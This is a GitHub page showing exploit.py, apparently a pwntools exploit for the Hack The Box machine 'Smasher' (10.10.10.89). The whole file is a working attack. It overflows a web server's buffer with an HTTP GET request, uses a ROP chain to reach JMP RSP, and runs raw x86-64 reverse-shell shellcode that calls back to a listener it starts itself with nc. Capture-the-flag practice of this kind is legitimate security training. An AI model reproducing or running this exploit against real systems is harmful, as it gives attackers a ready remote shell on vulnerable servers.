-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathexploit.py
59 lines (47 loc) · 1.74 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#!/usr/bin/python
import sys, os
from pwn import *
from urllib import quote as urlencode
if "TMUX" in os.environ:
context.terminal = ['tmux', 'splitw', '-v']
RHOST = "10.10.10.89"
RPORT = "1111"
LHOST = sys.argv[1]
LPORT = sys.argv[2]
def format(val):
x = ""
if '.' in val:
for i in val.split('.'):
x += p8(int(i))
else:
p = make_packer('all', endian = 'big')
x = p(int(val))
return x
r = remote(RHOST, RPORT)
junk = "A" * 568
rop_chain = flat (
0x401106, # 0x0000000000401106 : pop r13 ; ret
0xe4ff, # Hardcoded JMP RSP
0x4010ff, # 0x00000000004010ff : mov rax, r13 ; pop rbx ; pop rbp ; pop r12 ; pop r13 ; ret
"B" * 32, # Junk
0x4011dd, # #0x00000000004011dd : pop rdi ; ret
0x603500, # 0x00603000 0x00604000 rwxp /root/Smasher/tiny (RDI <- 0x00603500)
0x401304, # 0x0000000000401304 : mov dword ptr [rdi + 4], eax ; ret
0x603504, # JMP RSP execution (0x603504)
endianness = 'little', word_size = 64, sign = False)
shellcode = ""
shellcode += "\x68" + format(LHOST) + "\x66\x68" + format(LPORT) + "\x66\x6a\x02\x6a\x2a\x6a\x10"
shellcode += "\x6a\x29\x6a\x01\x6a\x02\x5f\x5e\x48\x31\xd2\x58\x0f\x05\x48\x89"
shellcode += "\xc7\x5a\x58\x48\x89\xe6\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48"
shellcode += "\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\xbf\x2f\x2f\x62"
shellcode += "\x69\x6e\x2f\x73\x68\x48\x31\xf6\x56\x57\x48\x89\xe7\x48\x31\xd2"
shellcode += "\xb0\x3b\x0f\x05"
payload = 'GET ' + urlencode(junk + rop_chain + shellcode) + '\r\n\r\n'
log.info("Payload length: %i" % len(payload))
log.info("Setting listener...")
run_in_new_terminal("nc -lvp " + LPORT)
sleep(1)
log.info("Sending payload...")
r.send(payload)
print r.recv()
r.close()